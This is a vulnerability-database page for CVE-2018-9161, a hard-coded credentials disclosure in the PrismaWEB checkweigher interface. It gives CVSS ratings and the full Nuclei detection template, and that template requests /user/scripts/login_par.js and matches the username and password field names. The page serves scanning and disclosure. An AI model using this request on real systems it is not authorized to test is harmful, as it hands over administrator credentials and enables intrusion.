Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-9161
HistoryFeb 24, 2022 - 12:18 p.m.

PrismaWEB - Credentials Disclosure

2022-02-2412:18:13
ProjectDiscovery
github.com
17
cve-2018-9161
prismaweb
exposure
edb
prismaindustriale
vulnerability

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.6

Confidence

High

EPSS

0.204

Percentile

96.5%

PrismaWEB is susceptible to credential disclosure. The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script.

id: CVE-2018-9161

info:
  name: PrismaWEB - Credentials Disclosure
  author: gy741
  severity: critical
  description: PrismaWEB is susceptible to credential disclosure. The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script.
  impact: |
    An attacker could gain unauthorized access to the application and potentially compromise user accounts and sensitive data.
  remediation: |
    Ensure that sensitive credentials are properly protected and not exposed in the application's source code or configuration files.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php
    - https://nvd.nist.gov/vuln/detail/CVE-2018-9161
    - https://www.exploit-db.com/exploits/44276/
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-9161
    cwe-id: CWE-798
    epss-score: 0.12574
    epss-percentile: 0.95318
    cpe: cpe:2.3:a:prismaindustriale:checkweigher_prismaweb:1.21:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: prismaindustriale
    product: checkweigher_prismaweb
  tags: cve2018,cve,prismaweb,exposure,edb,prismaindustriale

http:
  - method: GET
    path:
      - "{{BaseURL}}/user/scripts/login_par.js"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'txtChkUser'
          - 'txtChkPassword'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ffcd63af862f8b9aa24f999ad152b190ff12a716891947bdfcdf6f8928420413022006b1c871ad6ce93fb773c74b29e916effe0a6cb129653f58c5c4eb406cccfe6b:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.6

Confidence

High

EPSS

0.204

Percentile

96.5%

Related for NUCLEI:CVE-2018-9161